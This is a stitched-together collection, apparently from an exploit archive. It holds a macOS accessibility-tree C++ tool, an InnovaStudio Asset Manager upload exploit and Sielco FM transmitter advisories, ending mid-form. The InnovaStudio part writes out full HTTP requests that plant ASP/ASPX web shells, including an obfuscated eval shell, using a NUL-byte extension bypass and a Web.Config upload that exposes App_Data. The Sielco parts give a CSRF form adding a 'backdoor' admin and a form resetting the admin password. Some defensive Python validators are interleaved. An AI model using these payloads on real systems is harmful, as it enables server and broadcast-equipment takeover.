  if (isatty(STDOUT_FILENO)) {
    return os << "\e[1m";
  }
  return os;
}

std::ostream& bold_off(std::ostream& os) {
  if (isatty(STDOUT_FILENO)) {
    return os << "\e[0m";
  }
  return os;
}

std::string from_cfstr(CFTypeRef cf_ref) {
  if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID()) {
    const auto cf_str = static_cast<CFStringRef>(cf_ref);
    const auto max_length = static_cast<size_t>(CFStringGetMaximumSizeForEncoding(
        CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1;
    auto result = std::string(max_length, '\0');
    if (CFStringGetCString(cf_str, result.data(), static_cast<CFIndex>(max_length),
                           kCFStringEncodingUTF8)) {
      if (const auto pos = result.find('\0'); pos != std::string::npos) {
        result.resize(pos);
      }
      return result;
    }
  }
  return {};
}

std::string ax_element_id(AXUIElementRef value) {
  // AX element cache - AX elements are backed by CFData
  // (referring to 'remote' AX objects) and this data is
  // 'stable' across 'volatile' instances of AXUIElement.
  // 'hash and equality' of AX elements are based on this
  // data and therefore, we can use AXUIElement objects as
  // 'keys' in a dictionary with values, identifying these
  // objects (uniquely).
  const static auto ax_elements = CFDictionaryCreateMutable(
      kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
  auto ax_id = CFDictionaryGetValue(ax_elements, value);
  if (ax_id == nullptr) {
    if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault)) {
      if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid)) {
        CFDictionarySetValue(ax_elements, value, uuid_s);
        CFRelease(uuid_s);
      }
      CFRelease(uuid);
    }
    ax_id = CFDictionaryGetValue(ax_elements, value);
  }
  return from_cfstr(ax_id);
}

template <typename T>
T ax_attribute_value(AXUIElementRef e, CFStringRef name) {
  if (e != nullptr) {
    auto ref = T{};
    if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess) {
      return ref;
    }
  }
  return nullptr;
}

// NOLINTNEXTLINE
void ax_traverse(AXUIElementRef elem, uint32_t depth) {
  const auto max_depth = 10;
  if (depth > max_depth) {
    return;
  }
  const auto indent = [&]() {
    for (auto x = 0; x < depth; x++) {
      std::cout << " ";
    }
  };
  auto wid = CGWindowID{};
  if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess) {
    wid = 0;
  }
  indent();
  const auto role = ax_attribute_value<CFTypeRef>(elem, kAXRoleAttribute);
  std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role)
            << ", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]"
            << bold_off << std::endl;
  if (const auto children = ax_attribute_value<CFArrayRef>(elem, kAXChildrenAttribute)) {
    for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++) {
      const auto element = static_cast<AXUIElementRef>(CFArrayGetValueAtIndex(children, idx));
      ax_traverse(element, depth + 1);
    }
    CFRelease(children);
  }
}

int main(int argc, char* const argv[]) {
  auto pid = 0;
  if (argc > 1) {
    if (!AXIsProcessTrusted()) {
      std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl;
      exit(1);  // NOLINT
    }
    // NOLINTNEXTLINE
    pid = std::stoi(argv[1]);
  } else {
    std::cerr << "usage: axtester <pid>" << std::endl;
    exit(1);  // NOLINT
  }
  if (const auto app = AXUIElementCreateApplication(pid)) {
    auto observer = AXObserverRef{};
    auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/,
                                        CFStringRef name, auto ctx) {
      auto myapp = (__AXUIElement*)(ctx);
      auto hint = CFStringGetCStringPtr(name, kCFStringEncodingUTF8);
      std::cout << "Hint: " << hint << std::endl;
      ax_traverse(myapp, 0);
    }, &observer);
    if (kAXErrorSuccess != ret) {
      std::cerr << "Fail to create observer" << std::endl;
      return -1;
    }
    std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl;
    std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl;
    std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl;
    std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl;
    std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl;
    std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl;
    std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl;
    CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode);
    CFRunLoopRun();
  }
  return 0;
}
```

--codeaibot explains--

This is a C++ program that uses the Accessibility API (AX) provided by macOS to traverse the user interface of a running application and print out information about the accessibility elements that it finds.

The program takes a single argument, which is the process ID (PID) of the application to examine. If no argument is provided, the program displays a usage message and exits.

The main() function first checks if the Terminal app has been granted accessibility privileges by calling the AXIsProcessTrusted() function. If it hasn't, the program displays an error message and exits.

If the Terminal app has been granted accessibility privileges, the program creates an AXUIElementRef object for the application using the AXUIElementCreateApplication() function, passing in the PID as an argument.

The ax_traverse() function is then called with the root accessibility element of the application as an argument. This function recursively traverses the accessibility tree of the application, printing out information about each element it encounters.

The program also defines several helper functions for working with Core Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()), as well as some functions for printing formatted output to the console (bold_on() and bold_off()).

-- / --

As this issue is not a security issue nor results in security consequences, this report is not eligible for a VRP reward.

++ Thank you Amy!

--
-
InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
# Date: 11/04/2023
# Exploit Author: Zer0FauLT [[email protected]]
# Vendor Homepage: innovastudio.com
# Product: Asset Manager
# Version: <= Asset Manager ASP Version 5.4
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY

# ASP version, in i_upload_object_FSO.asp, line 234:
#
#     oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt"


(1) Trying to upload ASP / ASPX / PHP / CER / other shell file extensions
--------------------------------------------------------------------------

FILE PERMISSIONS : [ 0644 ]
DIR PERMISSIONS  : [ 0755 ]
UPLOAD FOLDER    : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ]

```http
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"

C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"


------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp"
Content-Type: application/octet-stream

<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
```

...[ RESPONSE ]...

    ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed.


(2) Now we will manipulate the filename: filename="shell.asp"
--------------------------------------------------------------

FILE PERMISSIONS : [ 0644 ]
DIR PERMISSIONS  : [ 0755 ]
UPLOAD FOLDER    : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ]

```http
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"

C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"


------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
Content-Type: application/octet-stream

<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
```

    >>> filename="shell.asp%00asp.txt" <<<

    [ %00 ] ===> Select these characters > Right Click > Convert Selection > URL > URL-decode
    or
    CTRL+Shift+U
    SEND!

...[ RESPONSE ]...

    OK!
    UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ]
    SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted]


(3) NO WRITE PERMISSION! Directory Traversal
---------------------------------------------

FILE PERMISSIONS : [ 0600 ]
DEFAULT DIR [\Editor\assets] PERMISSIONS : [ 0700 ]
OTHER [App_Data] DIR PERMISSIONS : [ 0777 ]
DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ]
App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ]
TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ]

# What is the App_Data folder useful for?
# App_Data contains application data files including .mdf database files, XML files, and other data store files.
# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information.
# The App_Data folder is not public like the other website directories under the Home Directory.
# Because it is a private directory, the IIS server hides it for security reasons.
# Now we will test whether such a directory exists.
# If the directory exists, we will make it public so that we can define the server settings needed to run a shell inside it.
# For this we will try to upload a special server configuration file, a Web.Config file. With it we will bypass the directory privacy.
# The directory will then be public, able to respond to external requests and to run a shell.

```http
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"

C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"


------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
Content-Type: application/octet-stream

<configuration>
  <system.webServer>
    <defaultDocument>
      <files>
        <add value="*.asp" />
        <add value="*.aspx" />
        <add value="*.php" />
      </files>
    </defaultDocument>
    <security>
      <requestFiltering>
        <hiddenSegments>
          <clear />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
```

...[ RESPONSE ]...

    OK!
    UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ]
    TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ]

# Now we will upload our shell to the directory where we made the bypass.

```http
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"

C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"


------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
Content-Type: application/octet-stream

<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String= Request["\x61\x62\x63\x64"];eval (PAY,"\x75\x6E\x73\x61"+ "\x66\x65");%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
```

...[ RESPONSE ]...

    OK!
    UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ]
    TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ]


So what can we do if no directory on the site has write permission?
If none has, we will test for vulnerabilities in the paths of other applications running on the server.
Sometimes this can be a mail service related vulnerability,
sometimes it can be a "Service Permissions" vulnerability,
sometimes a "Binary Permissions" vulnerability,
sometimes a "Weak Service Permissions" vulnerability,
sometimes an "Unquoted Service Path" vulnerability.
Our limits are as much as our imagination...

*** 0DAY ***

Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service.
We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service.

TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ]
Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ]

As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service,
and then upload our shell file to the server by bypassing it.
This way, we will have full control over both the server and the mail service.

Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ]
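The two bypasses above (a NUL byte hiding the real extension from the `AllowedTypes` check, and an attacker-chosen `inpCurrFolder2` pointing outside the asset folder) come down to validating the wrong string and the wrong path; the same extension-allowlist lesson applies to the unsanitized `img` upload in the CVE-2023-1826 post earlier on this page. The validator below is an added example (not InnovaStudio's code) that reproduces the weak check, shows what a NUL-terminated file API actually writes, and then applies the hardened checks; the root folder and sample names are constructed from the advisory's values.

```python
from pathlib import PureWindowsPath
from urllib.parse import unquote
import re

# The allow list quoted from i_upload_object_FSO.asp line 234.
ALLOWED = set("gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt".split("|"))
# Names IIS / ASP.NET read as configuration; never acceptable as an upload name.
RESERVED_NAMES = {"web.config", "global.asax", ".htaccess"}
# Upload root from the advisory (constructed for the demonstration; nothing is written).
UPLOAD_ROOT = PureWindowsPath(r"C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets")


def _decode(filename: str) -> str:
    # The advisory sends the NUL as a raw byte; "%00" is used in the samples here only
    # to keep them printable, and is decoded once to model what the server received.
    return unquote(filename)


def weak_is_allowed(filename: str) -> bool:
    """The kind of check the advisory defeats: look only at the text after the
    last dot. 'shell.asp\\x00asp.txt' ends in 'txt', but a C-string based file
    API stops at the NUL and creates 'shell.asp'."""
    return _decode(filename).rsplit(".", 1)[-1].lower() in ALLOWED


def stored_name(filename: str) -> str:
    """The name a NUL-terminated file API actually creates."""
    return _decode(filename).split("\x00", 1)[0]


def hardened_validate(filename: str) -> str:
    """Return a safe basename or raise ValueError. Order matters: reject control
    characters first, then strip any directory part, then check reserved names
    and the extension of the name that will really be written."""
    name = _decode(filename)
    if re.search(r"[\x00-\x1f\x7f]", name):
        raise ValueError("control character in filename")
    name = re.split(r"[\\/]", name)[-1]          # basename, whichever separator was used
    if name in ("", ".", ".."):
        raise ValueError("empty or dot-only filename")
    if name.lower() in RESERVED_NAMES:
        raise ValueError("reserved server configuration name")
    if "." not in name:
        raise ValueError("missing extension")
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension {ext!r} not in allow list")
    return name


def _lexical_parts(path: PureWindowsPath) -> list:
    """Collapse '.' and '..' segments without touching the filesystem."""
    parts = []
    for part in path.parts[1:]:                   # parts[0] is the drive anchor
        if part == "..":
            if parts:
                parts.pop()
        elif part != ".":
            parts.append(part)
    return parts


def resolve_target_folder(requested: str) -> PureWindowsPath:
    """inpCurrFolder2 in the advisory's third request points at ..\\App_Data.
    Accept a folder only if, after normalisation, it is UPLOAD_ROOT or below it
    (compared case-insensitively, as Windows paths are)."""
    target = PureWindowsPath(requested)
    if not target.is_absolute():
        target = UPLOAD_ROOT / target              # a rooted '\\x' replaces the root: still checked
    root_parts = _lexical_parts(UPLOAD_ROOT)
    target_parts = _lexical_parts(target)
    same_drive = target.anchor.lower() == UPLOAD_ROOT.anchor.lower()
    prefix = [p.lower() for p in target_parts[: len(root_parts)]]
    if not same_drive or prefix != [p.lower() for p in root_parts]:
        raise ValueError("upload folder outside the asset root")
    return PureWindowsPath(target.anchor, *target_parts)


def check_upload(filename: str, folder: str):
    """Combine both checks as an upload handler would; returns (accepted, detail)."""
    try:
        target = resolve_target_folder(folder)
        name = hardened_validate(filename)
    except ValueError as err:
        return False, str(err)
    return True, str(target / name)
```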
-
Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
## Exploit Author: LiquidWorm

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China.

Desc: The Cookie session ID 'id' is of an insufficient length and can be exploited by brute force, which may allow a remote attacker to obtain a valid session, bypass authentication and manipulate the transmitter.

Tested on: lwIP/2.1.1 Web/3.0.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5758
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php

26.01.2023

--

# Session values (len=5)

Cookie: id=44189
Cookie: id=37692
Cookie: id=+6638
Cookie: id=+3077
...
...
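To put a number on "insufficient length", the check below infers the alphabet and length from the four `id` values quoted above and reports the search space, an entropy upper bound and the expected time to hit a live session at a given guess rate, then contrasts that with an id drawn from the OS CSPRNG. This is an added example, not the advisory's or Sielco's code; the guess rate and session count are constructed inputs, and the 64-bit floor is the OWASP Session Management Cheat Sheet minimum.

```python
import math
import secrets

OBSERVED_IDS = ["44189", "37692", "+6638", "+3077"]   # the four values from the advisory
OWASP_MIN_ENTROPY_BITS = 64                            # OWASP session ID entropy minimum


def session_id_strength(samples, active_sessions=1, guesses_per_second=100.0):
    """Infer alphabet and length from the samples and return an upper bound on the
    id entropy plus the expected brute-force effort against `active_sessions`
    concurrently valid ids at `guesses_per_second`. It is an upper bound: the
    generator may use fewer symbols than were observed, or be predictable (a
    counter or a clock), in which case the real effort is lower still."""
    lengths = {len(s) for s in samples}
    if len(lengths) != 1:
        raise ValueError("samples have mixed lengths; analyse them separately")
    length = lengths.pop()
    alphabet = set("".join(samples))
    keyspace = len(alphabet) ** length
    bits = length * math.log2(len(alphabet))
    # With `active_sessions` valid ids spread over the keyspace, the first hit is
    # expected after roughly keyspace / (active_sessions + 1) guesses.
    expected_guesses = keyspace / (active_sessions + 1)
    return {
        "length": length,
        "alphabet_size": len(alphabet),
        "keyspace": keyspace,
        "entropy_bits": round(bits, 1),
        "meets_owasp_minimum": bits >= OWASP_MIN_ENTROPY_BITS,
        "expected_seconds_to_hijack": expected_guesses / guesses_per_second,
    }


def secure_session_id() -> str:
    """128 bits from the OS CSPRNG, hex encoded (32 characters), the usual remedy."""
    return secrets.token_hex(16)
```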
-
Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
## Exploit Author: LiquidWorm

Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: lwIP/2.1.1 Web/3.0.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5757
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php

26.01.2023
-->

CSRF Add Admin:
---------------

<html>
  <body>
    <form action="http://transmitter/protect/users.htm" method="POST">
      <input type="hidden" name="pwd0" value="" />
      <input type="hidden" name="pwd0bis" value="" />
      <input type="hidden" name="user1" value="" />
      <input type="hidden" name="pwd1" value="" />
      <input type="hidden" name="pwd1bis" value="" />
      <input type="hidden" name="auth1" value="" />
      <input type="hidden" name="user2" value="" />
      <input type="hidden" name="pwd2" value="" />
      <input type="hidden" name="pwd2bis" value="" />
      <input type="hidden" name="auth2" value="" />
      <input type="hidden" name="user3" value="backdoor" />
      <input type="hidden" name="pwd3" value="backdoor123" />
      <input type="hidden" name="pwd3bis" value="backdoor123" />
      <input type="hidden" name="auth3" value="2" />
      <input type="submit" value="Adminize!" />
    </form>
  </body>
</html>
-
Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password
## Exploit Author: LiquidWorm

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters for professional
broadcasting. The in-house laboratory develops standard and customised
solutions to meet all needs. Whether digital or analogue, each product is
studied to ensure reliability, resistance over time and a high standard of
safety. Sielco transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.

Desc: The application suffers from improper access control when editing
users. A user with Read permissions can manipulate users, passwords and
permissions by sending a single HTTP POST request with modified parameters
and edit other users' names, passwords and permissions, including the
admin password.

Tested on: lwIP/2.1.1
           Web/3.0.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5756
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php

26.01.2023
-->

<html>
  <body>
    <form action="http://transmitter/protect/users.htm" method="POST">
      <input type="hidden" name="pwd0" value="PWDCHANGED" />    <!-- This will set/modify admin pwd -->
      <input type="hidden" name="pwd0bis" value="PWDCHANGED" /> <!-- This will set/modify admin pwd -->
      <input type="hidden" name="user1" value="" />             <!-- This will set/modify user1 -->
      <input type="hidden" name="pwd1" value="" />              <!-- This will set/modify user1 pwd -->
      <input type="hidden" name="pwd1bis" value="" />           <!-- This will set/modify user1 pwd -->
      <input type="hidden" name="auth1" value="0" />            <!-- This will set user1 read perm -->
      <input type="hidden" name="user2" value="" />             <!-- This will set/modify user2 -->
      <input type="hidden" name="pwd2" value="" />              <!-- This will set/modify user2 pwd -->
      <input type="hidden" name="pwd2bis" value="" />           <!-- This will set/modify user2 pwd -->
      <input type="hidden" name="auth2" value="0" />            <!-- This will set user2 read perm -->
      <input type="hidden" name="user3" value="" />             <!-- This will set/modify user3 -->
      <input type="hidden" name="pwd3" value="" />              <!-- This will set/modify user3 pwd -->
      <input type="hidden" name="pwd3bis" value="" />           <!-- This will set/modify user3 pwd -->
      <input type="hidden" name="auth3" value="0" />            <!-- This will set user3 read perm -->
